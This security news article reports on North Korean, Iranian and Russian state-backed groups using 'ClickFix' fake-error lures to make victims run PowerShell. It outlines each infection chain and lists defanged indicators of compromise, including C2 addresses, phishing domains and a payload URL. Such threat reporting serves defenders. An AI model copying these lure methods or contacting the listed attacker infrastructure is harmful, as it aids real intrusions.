Security researchers have observed multiple state-sponsored hacking groups across North Korea, Iran, and Russia incorporating the ClickFix social engineering technique into their espionage operations between late 2024 and early 2025.
Originally associated with cybercriminals, ClickFix is now being adopted by advanced persistent threat (APT) actors, demonstrating the fluidity and cross-pollination of tactics in the global threat landscape.
ClickFix, first emerging in cybercrime circles in March 2024, leverages deceptive dialogue boxes and authoritative error messages to trick users into manually executing malicious commands typically PowerShell on their machines.
The method often presents fake system problems and demands users “fix” the issue by copying and pasting attacker-supplied commands, thus bypassing common automated defenses.
North Korean Campaigns
North Korea-based threat actor TA427 (overlapping with Kimsuky/Emerald Sleet) was observed implementing ClickFix as a pivotal infection chain stage earlier this year.
Attackers initiated contact by posing as diplomatic personnel, sending benign emails to individuals involved in North Korean policy.
Once trust was established, a follow-up message provided a PDF with a malicious link, directing targets to a spoofed secure drive hosting further instructions.
The infection process required victims to manually execute PowerShell commands that fetched and executed multi-stage scripts, ultimately deploying the QuasarRAT backdoor.
The infrastructure supporting these campaigns, mainly hosted on compromised South Korean servers and dynamic DNS domains, exhibited multilingual content and sophisticated social engineering.
Iranian Espionage with RMM Tools
In November 2024, Iran-affiliated TA450 (also known as MuddyWater/Mango Sandstorm) utilized ClickFix to target at least 39 organizations, mostly in the Middle East.
Posing as Microsoft security alerts, the attackers instructed recipients to run PowerShell with administrative privileges, then execute a supplied command.
According to the Report, this command installed the legitimate remote management tool “Level,” which was then abused for espionage and exfiltration.
This marked the first recorded instance of TA450 using Level, though they have previously leveraged other RMM tools (Atera, ScreenConnect, etc.).
.webp)
The campaign displayed a notable expansion in targeting scope beyond their typical focus on Israel.
Russian APTs have also experimented with ClickFix. In December 2024, UNK_RemoteRogue exploited compromised Zimbra mail servers to deliver emails with links masquerading as Microsoft Office portals.
Users were prompted to run attacker-supplied code, which executed PowerShell scripts tied to the Empire C2 framework.
Similar infrastructure was re-used in later phishing campaigns involving RDP delivery.
In another instance, TA422 (Sofacy/APT28) used Google Sheets lures that triggered reCAPTCHA events, instructing victims to run PowerShell that established SSH tunnels for remote control via Metasploit.
While ClickFix does not fundamentally transform the tradecraft of these state-backed actors, its integration demonstrates a trend where espionage groups quickly adapt cybercriminal techniques to evade detection and streamline initial compromise.
Notably, most observed groups reverted to traditional methods after their initial ClickFix campaigns, suggesting ongoing experimentation and operational trialling.
However, evidence points to recurring iterations by actors like TA427, indicating ongoing investment in refining this manual exploitation technique.
Despite the lack of persistent use, the cross-regional adoption of ClickFix underscores the necessity for organizations to enhance user awareness and technical controls against manual execution-based social engineering attacks.
As cybercriminal and espionage TTPs continue to converge, defenders must remain vigilant for new campaign variants leveraging similar social engineering methods.
Indicators of Compromise (IoCs)
| Indicator | Type | Description | First Seen |
|---|---|---|---|
| yasuyuki.ebata21@proton[.]me | TA427 sender email | Feb 2025 | |
| eunsoolim29@gmail[.]com | TA427 sender email | Jan 2025 | |
| 38.180.157[.]197 | IP | QuasarRAT C2 | Jan 2025 |
| office[.]rsvp | Domain | Delivery/Phishing infrastructure | Dec 2024 |
| mail.ukrtelecom[.]eu | Domain | Phishing infrastructure | Jan 2025 |
| ukrtelecom[.]eu | Domain | Phishing infrastructure | Jan 2025 |
| support@microsoftonlines[.]com | TA450 sender email | Nov 2024 | |
| microsoftonlines[.]com | Domain | TA450 phishing infrastructure | Nov 2024 |
| securedrive.fin-tech[.]com/docs/en/t.vmd | URL | PowerShell payload hosting | Jan 2025 |
| hxxps://office[.]rsvp/fin?document=2hg6739jh… | URL | UNK_RemoteRogue lures | Dec 2024 |
| 80.66.66[.]197 | IP | UNK_RemoteRogue email delivery | Dec 2024 |
| freedrive.servehttp[.]com | Domain | Payload delivery | Mar 2025 |
| raedom[.]store | Domain | C2 | Jan 2025 |
| 06816634fb019b6ed276d36f414f3b36f99b845ddd10… | SHA256 | Lure PDF (TA427) | Jan 2025 |
| 0ff9c4bba39d6f363b9efdfa6b54127925b8c606ecef… | SHA256 | Stager VBS script (TA427) | Jan 2025 |
| 85db55aab78103f7c2d536ce79e923c5fd9af14a2683… | SHA256 | QuasarRAT (TA427) | Jan 2025 |
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Data Breach at Legends International Exposes Customer Information")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Critical AnythingLLM Vulnerability Enables Remote Code Execution")
